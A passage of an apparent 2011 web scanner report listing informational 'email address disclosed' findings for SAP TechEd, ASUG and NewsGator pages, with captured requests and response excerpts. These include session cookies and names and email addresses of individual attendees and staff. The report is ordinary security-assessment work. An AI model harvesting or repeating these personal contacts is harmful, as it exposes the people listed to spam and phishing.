/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...
19.9. https://teched2011madrid.sapevents.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:32 GMT
Content-Length: 47531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAP TechEd Madrid Inquiry">
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAP TechEd Madrid Inquiry">sap@delegate.com</a>
...[SNIP]...
19.10. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /index.cfm?fuseaction=reg.ReturnLogin HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:27 GMT
Content-Length: 31925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAP TechEd Madrid Inquiry">
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAP TechEd Madrid Inquiry">sap@delegate.com</a>
...[SNIP]...
19.11. http://weblogs.sdn.sap.com/pub/u/251903803  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/251903803

Issue detail

The following email address was disclosed in the response:

Request

GET /pub/u/251903803 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:27 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50596

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Greg Chase</tit
...[SNIP]...
<br />
Just a reminder that the deadline to submit an entry to win tickets to TechEd Berlin is Sept 5.

If you have questions, or need an upload link for the contest, send an email to me: greg.chase@sap.com

For more information:

Read the Top Composite Competition announcement.

Read the competition rules and procedure to enter.
&nbsp;<i>
...[SNIP]...
19.12. http://www.asugonline.com/weborb.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /weborb.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /weborb.aspx HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
Content-Length: 361
Origin: http://www.asugonline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://www.asugonline.com/swfs/MainApp.swf?ver2.0.11159
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

........null../2...U
.....
..Oflex.messaging.messages.RemotingMessagesource.operation    body.messageId.clientId.timeToLive.headers.destination.timestamp.YVME.VCopious.BusinessComponents.ExhibitorsBC.-G
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-amf
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:49 GMT
Content-Length: 7472

......../2/onResult.......
..Uflex.messaging.messages.AcknowledgeMessage.timestamp    body.timeToLive.destination.messageId.clientId.headers.correlationId.Bs0q....
#._VME.VCopious.BusinessEntities.Result
...[SNIP]...
....................................................................................................
cOVME.VCopious.BusinessEntities.CompanyBE2.CompanyName.Phone.Email.Website.Address...h..7733985859..info@apos.com..www.apos.com......
3]VME.VCopious.BusinessEntities.TwitterAccountBE!TwitterAccountID.LoginName(.............
   .T..Antivia..T.    1005.@I.......@o@...............T........    /Assets/12/images/fg_images/2ef
...[SNIP]...
......................................................................................................................................................................................
.....T..12312312.!info@antivia.com..www.antivia.com......
............T..
   .U..Capgemini..b.    1006.@I.......@w................U..    .....    /Assets/12/images/fg_images/02571059-a6a3-45d9-9ac5-7e13a792ff04.png..b.......
...sAssets/Global/im
...[SNIP]...
.......................................................................................................................................................................................
.....b..12332112.9justin.norwood@capgemini.com........
..............
   .V..Dunn Solutions..n.    1007.@I.......@o@...............V..
.....    /Assets/12/images/fg_images/3ecf57a6-1758-47ae-aef1-d99d4167c182.png..n.......
...eAssets/Global/images/exhibi
...[SNIP]...
........................................................................................................................................................................
.....Dunn solutions..1112223333.9lblandford@dunnsolutions.com.+www.dunnsolutions.com......
..............
   .W..FIT..Freudenberg IT.    1008.@I.......@w................W........    /Assets/12/images/fg_images/5c5fb43f-bccb-402b-a1b5-788f00f6c2ef.png..........
...eAsse
...[SNIP]...
......................................................................................................................................................................................
.....~..12312311.;Karen.Bell@Freudenberg-IT.Com.Qhttp://www.freudenberg-it.us/us_Home.FIT......
...............
   .X..LaunchWorks....    1009.@I.......@o@...............X........    /Assets/12/images/fg_images/b416dbaf-4ade-46ed-8b8e-dc73a4a0e125.png.....
...[SNIP]...
.......................................................................................................................................................................................
........1231234./answers@launchworks.com.5http://www.launchworks.com......
...............
   .Y.Roambi....    1010.@I.......@w................Y.......    /Assets/12/images/fg_images/1cf30011-d6a3-4e12-b553-9d0464d79258.png..........
...sAssets/G
...[SNIP]...
.....................................................................................................................................................................................
........112342123.!sales@mellmo.com........
...............
   .Z.Sybase..&.    1011.@I.......@o@...............Z........    /Assets/12/images/fg_images/9a74bd7d-fdd2-453b-9417-178a46f3badf.png..&.......
...sAssets/Global/images/palettes_thum
...[SNIP]...
.......................................................................................................................................................................................
.....&..12312316.-amy.randers@sybase.com........
............&..
   ...    ASUG..2.    1001.@I.......@o@.......................    /Assets/12/images/fg_images/33c93e37-cc33-43d2-8460-44bd4e2f88d5.png..2.......
....Z.@k@......@b........................
...[SNIP]...
....................................................................................................................................................................................
.....2..1231231234.)laura.lesan@asug.com..www.asug.com......
..............
   .\.#Optimal Solutions...    1012.@I.......@w................\.................
....Z.@r ......@h................................@X@...............@b.......@L.........
...[SNIP]...
...................................................................................................................................................................................
.....>..512-607-6511.3Amy.Wilson@optimalsol.com.%www.optimalsol.com......
..............
   .]..Analytics8...    1014.@I.......@o@...............]..M..............
......@r ......@h................................@F................@b.......@L...............................................................................................................................................................................................
.....H....-steague@analytics8.com........
..................I9020B650-E622-4DBA-B1A9-24A0FEC55E79.I0ED5EC82-3BCA-447C-BB49-5350AB39FC75
...SESSION_TIMEOUT..Bs0..~...IA514FF80-5809-8CAD-256C-07F9678173F8
19.13. http://www.asugonline.com/weborb.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /weborb.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

POST /weborb.aspx HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
Content-Length: 362
Origin: http://www.asugonline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://www.asugonline.com/swfs/MainApp.swf?ver2.0.11159
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

........null../2...V
.....
..Oflex.messaging.messages.RemotingMessagesource.operation    body.messageId.clientId.timeToLive.headers.destination.timestamp.OVME.VCopious.BusinessComponents.UsersBC.=GetAtt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-amf
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:43 GMT
Content-Length: 4433

......../2/onResult.......
..Uflex.messaging.messages.AcknowledgeMessage.timestamp    body.timeToLive.destination.messageId.clientId.headers.correlationId.Bs0q.G..
#._VME.VCopious.BusinessEntities.Result
...[SNIP]...
witterUsername!LinkedInUsername!FacebookUsername.FlickrUsername/SynthesRegistrationUser..
3UVME.VCopious.BusinessEntities.SalutationBE.SalutationID.SalutationName.SortOrder........Harpreet.Chatha.....9harpreet.chatha@vcopious.com..hchatha........A.......
cOVME.VCopious.BusinessEntities.CompanyBE.CompanyID.CompanyName.PhoneT.Websitef.........
.cOVME.VCopious.BusinessEntities.AddressBE.AddressID    Name..Tn.Address1.Address2.POBox    
...[SNIP]...
ssEntities.EventUserSecurityRoleBE...SecurityRoles.LocationID.SubLocationID...
   ..
#YVME.VCopious.BusinessEntities.SecurityRoleBE:.RoleName....Attendee..........
   ....
..
.........Rajni..Jolly....QA1.1rajni.jolly@techtier.com..rajni........
....%Techtier Solutions.....
.............................
.....................
!...WAssets/Global/images/Avatars/Silhouette.gif................................................
%....    ..
)....`..........
   ..."
..
.........Ravneet..Singh.....7ravneet2.singh@techtier.com..rsingh2........
.....vcopious.....
.............................
.....................
!....n................................................
%..."    ..
)....`..........
   ...#
..
.........Bridgette..Chambers.....7bridgette.chambers@asug.com..bridgette........
....    ASUG.....
.............................
.....................
!...MAssets/12/images/Avatars/bridgette.jpg................................................
%...#    ..
)....`..........
   ...$
..
.........Anthony..Bosco, Jr.....-anthony.bosco@asug.com...........
...........
.............................
.....................
!...IAssets/12/images/Avatars/anthony.jpg................................................
%...$    ..
)....`..........
   ...%
..
.........Michael.Eisner......michael@sap.com...........
.....SAP.....
.............................
.....................
!...GAssets/12/images/Avatars/eisner.jpg................................................
%...%    ..
)....`..........
   ....
..
.........Courtney..Bjorlin.....3Courtney.Bjorlin@asug.com..courtney........
...........
.............................
.....................
!...OAssets/12/images/Avatars/courtney01.jpg................................................
%....    ..
)....`..........
   .../
..
.........Tom..Wailgum.....)tom.wailgum@asug.com.."........
...........
.............................
.....................
!...EAssets/12/images/Avatars/Tom01.jpg................................................
%.../    ..
)....`..........
   ...3
..
.........burke..pat.....-patrick.burke@vcop.com..Burke........
..........
.............................
.....................
!....n................................................
%...3    ..
)....`..........
   ...9
..
.........Vikas..Dhingra.....5vikas.dhingra@techtier.com.vikasd........
.....x.....
.............................
.....................
!....n................................................
%...9    ..
)....`..............I64DF4C63-0E3D-425C-A114-5EF15C90396
...[SNIP]...
19.14. http://www.newsgator.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /Default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Default.aspx?tabid=214 HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.1.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:26:01 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 39297
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
String.fromCharCode(116,114,105,97,108,115,117,112,112,111,114,116,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?subject=I%20would%20like%20help%20with%20my%20Social%20Sites%202010%20Trial')">trialsupport@newsgator.com</a>
...[SNIP]...
ript:void(location.href='mailto:'+String.fromCharCode(105,110,115,105,100,101,115,97,108,101,115,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?subject=Re%3A%20Social%20Sites%202010%20Trial')">insidesales@newsgator.com</a>
...[SNIP]...
19.15. http://www.newsgator.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/javascript, application/javascript, */*
Referer: http://www.newsgator.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; language=en-US; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.1.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:25:48 GMT
ETag: "080d979c2fcc1:0"
Last-Modified: Mon, 20 Jun 2011 22:47:28 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 10101
Connection: keep-alive

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...
19.16. http://www.newsgator.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/javascript, application/javascript, */*
Referer: http://www.newsgator.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; language=en-US; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.1.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:25:50 GMT
ETag: "080d979c2fcc1:0"
Last-Modified: Mon, 20 Jun 2011 22:47:28 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 11495
Connection: keep-alive

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...
19.17. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /partners/become-a-newsgator-partner.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /partners/become-a-newsgator-partner.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/partners/become-a-newsgator-partner.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; Agg469_SelectedElementId=1; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.3.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Agg1216_SelectedElementId=5; DNNSTUFF_Aggregator=1217=5; language=en-US; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 52034
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(108,97,117,114,97,102,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">lauraf@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(112,97,114,116,110,101,114,115,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">partners@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(101,117,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">eu-info@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(8232,106,112,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">jp-info@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(112,97,114,116,110,101,114,115,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">partners@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(101,117,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">eu-info@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(8232,106,112,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">jp-info@newsgator.com</a>
...[SNIP]...
19.18. http://www.newsgator.com/partners/channel-partners.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /partners/channel-partners.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /partners/channel-partners.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/partners/channel-partners.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; Agg469_SelectedElementId=1; Agg1216_SelectedElementId=5; DNNSTUFF_Aggregator=1217=5; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.4.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 64631
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(112,97,114,116,110,101,114,115,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">partners@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(112,97,114,116,110,101,114,115,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">partners@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(101,117,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">eu-info@newsgator.com</a>
...[SNIP]...
<a href="javascript:void(location.href='mailto:'+String.fromCharCode(8232,106,112,45,105,110,102,111,64,110,101,119,115,103,97,116,111,114,46,99,111,109)+'?')">jp-info@newsgator.com</a>
...[SNIP]...
19.19. http://www.sap.com/about-sap/company/legal/privacy.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:42 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:42 GMT
Content-Length: 22056


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...
